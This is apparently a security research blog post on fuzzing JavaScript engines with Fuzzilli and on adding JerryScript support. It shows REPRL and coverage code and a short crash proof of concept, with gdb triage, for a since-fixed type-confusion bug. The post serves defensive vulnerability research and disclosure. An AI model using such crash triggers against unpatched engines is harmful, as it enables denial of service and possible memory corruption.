Fuzzing JavaScript Engines with Fuzzilli

Background

As part of my research at Doyensec, I spent some time trying to understand current fuzzing techniques that could be leveraged against popular JavaScript engines (JSEs), with a focus on V8. Note that I did not have any prior experience with fuzzing JSEs before starting this journey.

Dharma

My experimentation started with a context-free grammar (CFG) generator: Dharma. I quickly realized that the grammar rules for generating valid JavaScript code that does something interesting are too complicated. Type confusion and JIT engine bugs were my primary focus; however, most of the generated code was syntactically incorrect, and every statement had to be wrapped in a try/catch block to deal with it. After a few days of fuzzing, I was only able to find out-of-memory (OOM) bugs. If you want to read more about V8 JIT and Dharma, I recommend this thoughtful research.

Dharma allows you to specify three sections for various purposes. The first one, variable, lets you define variables that are later used in the value section. The last one, variance, is commonly used to specify the starting symbol for expanding the CFG tree.

The linkage is implemented inside the value section. A nice feature of Dharma is that you only define the assignment rules or function invocations, and the variables are automatically created when needed. However, if we assign a variable of type A to one of a different type B, we have to include all the type A rules inside the type B object.

Here is an example of such a rule:

try { !TYPEDARRAY! = !ARRAYBUFFER!.slice(!ANY_FUNCTION!, !ANY_FUNCTION!) } catch (e) {};

As you can imagine, without writing an additional library, the code quickly becomes complicated and clumsy.

Fuzzing with coverage is mandatory when targeting popular software, as a pure blackbox approach only scratches the attack surface. Coverage can be easily obtained by compiling the binary with a specific Clang (the compiler frontend of the LLVM infrastructure) flag. Part of the output can be seen in the picture below. In my case, it was only useful for manual code review and grammar adjustment, as there was no convenient way to implement a mutator on the JavaScript source code.

Coverage Report for V8

Fuzzilli

As an alternative approach, I started to play with Fuzzilli, which I think is an incredible and still very underrated fuzzer, implemented by Samuel Groß (aka Saelo). Fuzzilli uses an intermediate representation (IR) language called FuzzIL, which is perfectly suitable for mutation. Moreover, any program in FuzzIL can always be converted (lifted) to valid JavaScript code.

At that time, the supported targets were V8, SpiderMonkey, and JavaScriptCore. As these engines continuously undergo widespread fuzzing, I decided to implement support for a different JavaScript engine instead. I was also interested in the communication protocol between the fuzzer and the engine, so I considered expanding this fuzzer an excellent exercise.

I decided to add support for JerryScript. In past years, numerous security issues were discovered in this target by Fuzzinator, which uses the ANTLR v4 testcase generator Grammarinator. Those bugs were investigated and fixed, so I wanted to see if Fuzzilli could find something new.

Fuzzilli Basics

REPRL

The best available high-level documentation about Fuzzilli is Samuel's Master's thesis, where it was introduced. I strongly recommend reading it, as this article only summarizes some of its novel ideas.

Many modern fuzzer architectures use a Forkserver. The idea behind it is to run the program until the initialization is complete, but before it processes any input. Right after that, the input from the fuzzer is read and passed to a newly forked child. The overhead is low since the initialization occurs only once, plus whenever a restart is needed (e.g. in the case of continuous memory leaks).

Fuzzilli uses the REPRL approach, which saves the overhead caused by fork(); the measured execution per sample can be ~7 times faster. The JS engine is modified to read the input from the fuzzer and, after executing the sample, to report the coverage. The crucial part is resetting the state between samples, which is normally (obviously) not done, as the engine keeps the context of already defined variables. In contrast with the Forkserver, we need rudimentary knowledge of the engine: it is useful to know how the engine's string representation is implemented internally in order to feed the input or add additional commands.
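
To give a feel for the protocol, here is a rough engine-side REPRL loop sketched in Python rather than the C actually patched into an engine. The descriptor numbers (100-103) and the message layout reflect my reading of Fuzzilli's target patches; treat them as assumptions and check the reference implementations:

# Hedged Python sketch of the engine-side REPRL loop (fds and layout are
# assumptions based on Fuzzilli's target patches, not a specification)
import os
import struct

REPRL_CRFD, REPRL_CWFD, REPRL_DRFD, REPRL_DWFD = 100, 101, 102, 103

def execute_script(source):
    # Hand the source to the engine and return an exit-code-like status
    return 0

# Handshake: both sides exchange "HELO"
os.write(REPRL_CWFD, b'HELO')
assert os.read(REPRL_CRFD, 4) == b'HELO'

while True:
    if os.read(REPRL_CRFD, 4) != b'exec':
        break
    (size,) = struct.unpack('<Q', os.read(REPRL_CRFD, 8))
    script = os.read(REPRL_DRFD, size).decode()
    status = execute_script(script) & 0xff
    os.write(REPRL_CWFD, struct.pack('<i', status << 8))
    # ...reset the engine state here before the next sample...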

Coverage

LLVM provides a convenient way to obtain edge coverage. By passing the -fsanitize-coverage=trace-pc-guard compiler flag to Clang, we receive pointers to the start and end of the guard regions, which are initialized with guard numbers, as described in the LLVM documentation:

extern "C" void __sanitizer_cov_trace_pc_guard_init(uint32_t *start,
                                                    uint32_t *stop) {
  static uint64_t N;  // Counter for the guards.
  if (start == stop || *start) return;  // Initialize only once.
  printf("INIT: %p %p\n", start, stop);
  for (uint32_t *x = start; x < stop; x++)
    *x = ++N;  // Guards should start from 1.
}

The guard regions are compiled into the JSE target, which means the JavaScript engine must be modified to accommodate these changes. Whenever a branch is executed, the __sanitizer_cov_trace_pc_guard callback is called. Fuzzilli uses a POSIX shared memory object (shmem) to avoid overhead when passing the data to the parent process. The shmem holds a bitmap in which each visited edge is set; after each JavaScript input is processed, the edge guards are reinitialized.
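
Conceptually, the fuzzer side only has to attach to the shared memory object and count the set bits. A toy sketch (the shmem name is hypothetical, and Fuzzilli's real layout prefixes the bitmap with a small header):

# Toy sketch: count visited edges in a shared-memory coverage bitmap
from multiprocessing import shared_memory

shm = shared_memory.SharedMemory(name='shm_coverage_0')  # hypothetical name
edges = sum(bin(byte).count('1') for byte in bytes(shm.buf))
print(edges, 'edges visited')
shm.close()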

Generation

We are not going to repeat the program generation algorithms here, as they are described in detail in the thesis. The surprising fact is that all the programs stem from this simple JavaScript seed, to which multiple mutators are cleverly applied:

Object()

Integration with JerryScript

To add a new target, several modifications for Fuzzilli should be implemented. From a high level, the REPRL pseudocode is described here.

As we already mentioned, the JavaScript engine must be modified to conform to Fuzzilli's protocol. To keep the same code standards and logic, we recommend adding a custom command line parameter to the engine. If the interpreter is run without it, it behaves normally. Otherwise, it uses the hardcoded descriptor numbers to let the parent know that the interpreter is ready to process our input.

Fuzzilli internally uses a custom command, by default called fuzzilli, which the interpreter should also implement. The first parameter represents the operator - it can be either FUZZILLI_CRASH or FUZZILLI_PRINT. The former is used to check that segmentation faults can be intercepted, while the latter (optional) is used to print the output passed as an argument. By design, the fuzzer refuses to run when some of these checks fail, e.g. when the FUZZILLI_CRASH operation is not implemented.

The code is very similar between different targets, as you can see in the patch for JerryScript that we submitted.

For a basic setup, one needs to write a short profile file stored in Sources/FuzzilliCli/Profiles/. Here we can specify additional builtins specific to the engine, extra arguments or, thanks to the recent contribution from WilliamParks, the ECMAScriptVersion.

Results

By integrating Fuzzilli with JerryScript, Doyensec was able to identify multiple bugs, reported through GitHub over the course of four weeks. All of these issues have since been fixed.

All issues were also added to the Fuzzilli Bug Showcase:

Fuzzilli Showcase

Fuzzilli is by design efficient against targets with JIT compilers. It can abuse the non-linear execution flow by generating nested callbacks, prototypes or Proxy objects, where the state of a different object can be modified. Samples produced by Fuzzilli are specifically generated to incorporate these properties, as required for the discovery of type confusion bugs.

This behavior can easily be seen in Issue #3836. As in most cases, the proof of concept generated by Fuzzilli is very simple:

function main() {
    var v3 = new Float64Array(6);
    var v4 = v3.buffer;
    v4.constructor = Uint8Array;
    var v5 = new Float64Array(v3);
}
main();

This can be rewritten, without changing the semantics, to even simpler code:

var v1 = new Float64Array(6);
v1.buffer.constructor = Uint8Array;
new Float64Array(v1);

The root cause of this issue is described in the fix.

In JavaScript, when a typed array like Float64Array is created, its raw binary data buffer can be accessed via the buffer property, represented by the ArrayBuffer type. Here, however, that constructor was altered to the typed array view Uint8Array. During initialization the engine expected an ArrayBuffer instead of the typed array, and when calling the ecma_arraybuffer_get_buffer function the typed array pointer was cast to an ArrayBuffer. Note that this is possible because asserts are removed in production builds. This caused the type confusion bug on line 196.

Consequently, the destination buffer dst_buf_p contained an incorrect pointer, and we can see the resulting memory corruption when triaging via gdb:

Program received signal SIGSEGV, Segmentation fault.
ecma_typedarray_create_object_with_typedarray (typedarray_id=ECMA_FLOAT64_ARRAY, element_size_shift=<optimized out>, proto_p=<optimized out>, typedarray_p=0x5555556bd408 <jerry_global_heap+480>)
    at /home/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:655
655	    memcpy (dst_buf_p, src_buf_p, array_length << element_size_shift);
(gdb) x/i $rip
=> 0x55555557654e <ecma_op_create_typedarray+346>:	rep movsb %ds:(%rsi),%es:(%rdi)
(gdb) i r rdi
rdi            0x3004100020008     844704103137288

Some of the issues, including the one mentioned above, could probably be escalated from Denial of Service to Code Execution. Because of time constraints and the limited added value, we did not attempt to implement a working exploit.

I want to thank Saelo for including my JerryScript patch in Fuzzilli. And many thanks to Doyensec for funding the 25% research time which made this project possible.
